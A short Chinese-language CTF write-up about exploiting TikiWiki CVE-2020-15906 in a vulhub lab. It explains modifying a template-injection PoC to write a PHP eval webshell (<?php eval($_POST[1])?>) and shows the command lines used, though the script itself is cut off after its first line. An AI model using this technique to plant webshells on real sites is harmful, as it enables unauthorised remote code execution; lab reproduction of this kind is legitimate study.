CVE-2020-15906
vulhub/tikiwiki/CVE-2020-15906/README.zh-cn.md at master · vulhub/vulhub · GitHub
比赛遇见个tikiwiki,byd执行不了几条命令就崩,写马还写不进去,各种转义转着转着就崩了,比如这个python poc.py 127.0.0.1:8080 / 'echo "\<?php${IFS}?\>">shell.php'
,这里空格会截断,转义就崩,用IFS也崩。比赛的时候没给我干红温复现给我干红温了。
这个poc的利用部分是CVE-2021-26119的模板注入,直接把模板注入里的shell_exec改成file_put_contents就能写马了。
pocw.py
1 | import requests |
python pocw.py 127.0.0.1:8080 / shell.php
,shell.php是写马的文件名,内容是<?php eval($_POST[1])?>
。写完以后面崩了也没事,这个马还能继续用。
还有,这个沟槽的poc不能加80端口,python poc.py 127.0.0.1:80 / 'whoami'
就报错python poc.py 127.0.0.1 / 'whoami'
就正常。其他端口加上都没事,就80不行。